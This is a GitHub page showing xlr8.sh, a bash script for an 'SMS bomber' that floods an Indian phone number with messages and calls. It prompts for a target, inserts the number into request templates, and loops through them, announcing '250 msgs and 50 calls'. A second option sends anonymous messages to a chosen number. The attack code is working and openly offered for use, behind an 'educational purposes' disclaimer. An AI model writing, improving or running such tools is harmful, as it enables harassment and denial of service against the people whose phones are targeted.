forked from sonudohare85/XLR8_BOMBER
-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathxlr8.sh
223 lines (192 loc) · 4.59 KB
/
xlr8.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
#!/bin/bash
#---------------------------------
# XLR8 BOMBER 2.0 !
# Coded by Adarsh Prakash
# Dont try to Steal it Bitch
#---------------------------------
apt install wget -y
clear
just() {
clear
echo ""
echo ""
printf " \e[1;33m|C|O|N|N|E|C|T|I|N|G|"
echo ""
echo ""
echo ""
apt install figlet -y
}
wget -q --spider https://github.com/mikiadarsh25
if [ $? -eq 0 ]; then
just
else
clear
echo -e "\e[1;34m "
figlet -c XLR8 BOMB3R
sleep 1
echo ""
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m You are not connected to internet !\e[93m"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Please connect and try again !!\e[93m"
echo ""
echo ""
exit
fi
banner() {
echo -e "\e[1;34m "
#After \e[1;34m a blank character is used to give purple colour to banner
figlet -c XLR8 BOMB3R
sleep 1
echo -e " \e[91mAuthor:Adarsh Prakash"
sleep 1
echo -e " \e[36mGroup:Linux Repo"
echo ""
}
updatee() {
clear
apt install git -y
echo -e "\e[92m "
clear
figlet -c -f slant Updating Script
echo ""
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Requesting Update From Source...\e[93m"
sleep 2
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Request Attempt Successful..\e[93m"
sleep 1
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Updating Now...\e[93m"
sleep 1
echo ""
cd ..
rm -rf XLR8_BOMBER
git clone https://github.com/mikiadarsh25/XLR8_BOMBER
cd XLR8_BOMBER
chmod +x xlr8.sh
clear
figlet -c -f slant Script Updated
sleep 1
echo ""
echo -e " \e[92m[\e[91m~\e[92m]\e[91m Restarting XLR8 !\e[93m"
sleep 2
bash xlr8.sh
}
PW_WD=$(pwd)
cd model
cp headapis $PW_WD
cp tailapis $PW_WD
cp anonapi $PW_WD
cd ..
menu(){
echo ""
printf "\e[1;92m[\e[0m xlr8\e[1;92m ]\e[0m \e[1;93mEnter target >>> \e[0m\n"
read -p '---------------> ' targett
printf "\n"
echo $targett > targetlist.txt
printf ">~~~>\e[1;92m Starting Attack On +91$targett \e[0m<~~~<"
sleep 1
echo ""
echo ""
printf "\n"
printf "Press ctrl+c to quit ! \n"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Else it will automatically stop after 5 min\e[93m"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m After sending 250 msgs and 50 calls !!\e[93m"
echo ""
while read a; do
echo ${a//€shushhi/$targett}
done < headapis > headapis.t
mv headapis{.t,}
while read a; do
echo ${a//€shushhi/$targett}
done < tailapis > tailapis.t
mv tailapis{.t,}
for i in {1..4}
do bash headapis
done
for i in {1..26}
do bash tailapis
done
}
anonmsg(){
rm records.txt > /dev/null 2>&1
echo ""
printf "\e[1;92m[\e[0m xlr8\e[1;92m ]\e[0m \e[1;93mEnter target >>> \e[0m\n"
read -p '---------------> ' smstarget
printf "\e[1;92m[\e[0m xlr8\e[1;92m ]\e[0m \e[1;93mEnter Your Message >>> \e[0m\n"
read -p '---------------> ' text
echo ""
while read a; do
echo ${a//₹axx/$smstarget}
done < anonapi > anonapi.t
mv anonapi{.t,}
while read a; do
echo ${a//€amsg/$text}
done < anonapi > anonapi.t
mv anonapi{.t,}
bash anonapi > records.txt
value=$( grep -o "true" records.txt)
if [[ $value = "true" ]]
then
echo ""
printf "\e[92m[\e[91m~\e[92m] \e[0m\e[44mSuccess !!\e[0m\n"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Please be pateint, Msgs take some time to get delivered !!\e[93m"
echo ""
read -p "Press enter to continue... "
else
echo ""
printf "\e[92m[\e[91m~\e[92m] \e[0m\e[44mError 404 !\e[0m\n"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m This feature doesn't works sometimes !!\e[93m"
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Remember you can only send one msg per day !\e[93m"
echo ""
read -p "Press enter to continue... "
fi
}
menux() {
clear
apt install curl
clear
banner
sleep 1
date
echo "------------------------------"
printf "\e[1;33mThis tool is only for Educational Purposes !!\e[0m"
echo ""
echo "------------------------------"
echo -e "\e[34mThis Bomber Only Works In India :)"
echo "------------------------------"
echo ""
sleep 1
printf "\e[1;92m[\e[0m 1\e[1;92m ]\e[0m>>>\e[1;93m ATTACK ON NUMBER \e[0m\n"
printf "\e[1;92m[\e[0m 2\e[1;92m ]\e[0m>>>\e[1;93m SEND ANONYMOUS MSG \e[0m\n"
printf "\e[1;92m[\e[0m 3\e[1;92m ]\e[0m>>>\e[1;93m UPDATE \e[0m\n"
printf "\e[1;92m[\e[0m 4\e[1;92m ]\e[0m>>>\e[1;93m QUIT \e[0m\n"
printf "\n"
read -p 'Select Option !! >>> ' options
if [ "$options" -eq "1" ];then
menu
fi
if [ "$options" -eq "2" ];then
anonmsg
fi
if [ "$options" -eq "3" ];then
updatee
fi
if [ "$options" -eq "4" ];then
echo ""
echo -e "\e[92m[\e[91m~\e[92m]\e[93m Thanks for Using XLR8 !\e[93m"
echo ""
exit
exit
exit
else
menux
fi
}
menux